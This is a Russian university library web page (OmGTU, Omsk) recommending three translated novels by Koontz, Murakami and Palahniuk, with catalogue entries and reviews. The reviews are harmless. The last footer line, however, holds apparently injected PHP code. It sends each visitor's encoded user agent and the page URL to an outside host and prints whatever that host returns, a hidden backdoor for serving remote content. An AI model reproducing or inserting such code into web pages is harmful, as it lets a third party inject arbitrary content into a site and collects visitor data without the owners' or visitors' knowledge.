Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

253 пользователей



 
      Наши партнеры
Студенческий информационный портал компании

: Июнь

Книги этих авторов неизменно вызывают интерес и споры читателей и критиков. Ими зачитываются, их обсуждают, ими восхищаются или осуждают...

VST=470
1. 
Кунц, Дин. Ложная память [a] / Дин Кунц ; пер. с англ. А. Гришина ; дар. Т. В. Морозова, 2010. - 701, [1]4.
Ключевые слова 
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ11

Уже более 20 лет на титул Короля Страха претендуют два американских писателя – Стивен Кинг и Дин Кунц. По мнению "New York Times": "Люди боятся читать Стивена Кинга, а сам Стивен Кинг боится читать Дина Кунца". Дин Кунц - непревзойденный мастер остросюжетных триллеров, которые держат в напряжении с первой и до последней строчки. Из-под его пера вышли десятки увлекательнейших романов, переведенных на 38 языков мира. Из 60 книг Кунца 12 стали национальными бестселлерами США, а 7 его романов возглавили список бестселлеров "New York Times". Выход каждого нового романа Дина Кунца — событие, которого с нетерпением ждут его многочисленные поклонники. Суммарный тираж его книг превысил 200 миллионов экземпляров.

В новом романе «Ложная память» Кунц верен себе. Он бередит самые глубинные струны человеческой души, закручивая тонкую интригу на насыщенном мистическими красками фоне. Роман не только интересен сюжетом, но и заставляет задуматься о том, как легко можно стать игрушкой в чужих руках. Круг "игрушек" доктора Аримана, для которого клятва Гиппократа не принцип жизни, а лишь ширма, очень широк, ему доверяют многие: от кинозвёзд до простых смертных. Оказывается, врачи, которым привыкли доверять, могут управлять людьми, правда, не в открытую, а тайно. А доктор Ариман очень любит поиграть, он одержим идеями, он "внушает" нужный диагноз. Главные герои Марина и Дастин Роде становятся жертвами жестоких и опасных экспериментов. За два дня их жизнь превращается в ад. Им внедрили ложную память, полную ужасных драм и преступлений, которых на самом деле вовсе не происходило. Но кто стоит за ужасными экспериментами и каков смысл всех этих манипуляций? И найти ответы на эти вопросы совсем не просто. Читая эту психологическую драму, понимаешь, что история - вымышленная, перед нами - всего лишь книжные герои, но все же подсознательно думаешь: «А вдруг?». Честно говоря, страшно встретить в жизни такого вот завоевателя мира, как доктор Ариман.

2. 
Мураками, Харуки. Токийские легенды [a] : рассказы / Харуки Мураками ; пер. с яп. А. Замилова, 2010. - 167, [2]4.
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ11

Еще одна легенда современной мировой литературы — уникальный и абсолютный мастер слова Харуки Мураками. Преданные поклонники творчества этого писателя навсегда пленены его очарованием, эстетством и глубиной. На родине Харуки Мураками критики часто называют его самым неяпонским писателем. А в Европе и Америке многие именно по его книгам судят о современном японце. В России популярность «самого неяпонского японца» также высока, книги автора продаются миллионными тиражами, и на протяжении многих лет интерес к этому автору не угасает. Новый сборник рассказов «Токийские легенды» будет интересен как «мураками-манам», так и тем, кто только знакомится с творчеством писателя. «Токийские легенды» - это тот самый «фирменный» Мураками, создавший «Охоту на овец», «Дэнс, дэнс, дэнс» и другие бестселлеры, покорившие мир. В предисловии к «Легендам» автор пишет: «Просто подумал, что пришло время рассказать несколько странных историй, случившихся со мной в прошлом. Признаться, случаи такого рода происходили в моей жизни нередко. Некоторые имели смысл и как-то повлияли на мою жизнь. Некоторые же так незначительны, что и не заслуживают особого внимания. Они никак на мне не отразились.» Истории, полные мистики, неожиданных поворотов в жизни, возможно, просто развлекут читателя и не отразятся на его судьбе. Но тот, кто знаком с творчеством Мураками, хорошо знает, что каждое произведение этого автора - настоящее приключение для читателя.

Книга содержит маленькие рассказы, каждый по-своему оригинален и загадочен. Мы узнаём о простых жителях Токио, судьба которых по-своему трагична.

Женщина, потерявшая в море своего сына, которого унесла волна. Ему было 19 лет, и больше всего на свете он любил сёрфинг. С тех пор она ездит на этот берег, долгие годы сидит и смотрит в море. Говорят, что любители волн часто видят молодого парня со сломанной доской, который ходит недалеко от берега. И только она, его мать, не видит...

Молодой человек нетрадиционной ориентации давно не общался с семьёй. Его не поняли и не приняли родные. Случайная встреча с некой женщиной - знак свыше. Он говорит замечательные слова: «Только когда ты принимаешь себя таким, какой ты есть, ты счастлив по-настоящему».

Молодой человек, исчезнувший между 25 и 27-м этажами. А потом его находят на каком-то вокзале, он не помнит, как там очутился. Что это было - провал в памяти или возможность его близким что-то понять и оценить?

Обезьяна, ворующая имена, умеющая любить и говорить («Обезьяна из Синагавы»).

Дзюмпэй - писатель, сочиняющий рассказ о женщине-враче, нашедшей на берегу реки камень, формой и цветом напоминающий почку («Перекати-камень в форме почки»). Женщина принесла его на работу, где он таинственным образом по ночам перемещался с места на место. Постепенно камень овладевает ее жизнью, она общается с ним как с живым существом, перестает интересоваться событиями, которые происходят в реальной жизни. Но рассказ не дописан, неясна его концовка. Написание рассказа совпало со знакомством с необычной девушкой. Дзюмпэй неожиданно заканчивает рассказ совсем не так, как планировал. В то же время он понимает, что до сих пор такого взаимопонимания и такого сильного чувства не было ни к одной женщине. Но, как только работа над рассказом закончилась, девушка навсегда исчезла.

Встречи и расставания. Жизнь, какая она есть. Перед нами искренняя проза о мужчинах, женщинах и большом городе, где они влюбляются, ждут, страдают от одиночества. Даже мистические моменты и те — обыденные, житейские. И нам вдруг открывается что-то главное, чего не увидишь глазами...

3. 
Паланик, Чак. Пигмей [a] : роман / Чак Паланик ; пер. с англ. Н. Красникова, 2010. - 315, [1]4.
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ1

?Североамериканский писатель Чак Паланик, культовый классик современной альтернативной прозы, как обычно шокировал на сей раз своим новым романом «Пигмей». Перед нами винегрет из классической тоталитарной утопии, шпионского романа, классической американской комедии и подросткового любовного романа.

?Сюжет «Пигмея» вращается вокруг 13-летнего боевика из страны с победившим тоталитаризмом, приехавшего в неназванный штат под видом ученика по обмену. Юный боевик и его сообщники готовят серию терактов под названием «Операция Хаос». Прозвище «Пигмей» герой получил за миниатюрные размеры (настоящее его имя неизвестно, в книге он называет себя «Агентом номер 67»). В США главный герой живет в простой семье среднего класса, ходит в школу, в церковь. Но Пигмей не удовлетворяется ролью среднего американца, он становится местным героем, и шокирующие, не самые приятные для чтения сцены этого становления достаточно подробно описаны Палаником. На самом же деле «Агент номер 67» готовится к карающему удару против выродившейся Америки во имя настоящих ценностей, без труда собирая под носом у американцев свое гибельное устройство. Но, несмотря на все его старания, супероперация срывается...

?Весь роман, за исключением цитат известных людей и прямой речи американцев, написан весьма своеобразным языком подростка-иностранца, обладающего внушительным словарным запасом и при этом патологически неспособного постичь чужую грамматику. Очень оригинально, но вначале читать объективно тяжело. Читатель, ожидавший от любимого писателя очередной порции крепкоcбитого, острого, легкоусваиваемого чтива, получил пусть острую, но чрезвычайно неудобоваримую стилизацию в таком духе: «Неприступная рубежи США взломом преуспей каждый боевик. Среднего уровня дохода прогнившая ячейка общества внедрись, все граница одного города сосед и школа аналогично. Задача номер один: начало подрывная сеть зародыш». Таким «чудесным» языком написана вся книга.

?Кто-то считает, что Паланик никогда не напишет второго «Бойцовского клуба». Та уникальная изюминка, которая заставляла всех поклонников писателя сходить с ума от восторга, пропала, а несуразный «Пигмей» вызывает лишь раздражение.

?А для кого-то «Пигмей» встал в один ряд с «Бойцовским клубом» и «Удушьем» и читался с удовольствием. В любом случае, новинка от популярного автора - это всегда любопытно, и стоит прочитать хотя бы пару страниц, может быть, и затянет.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2720 - 20.11.2018
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.06 с.10 запросов, 0.77c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;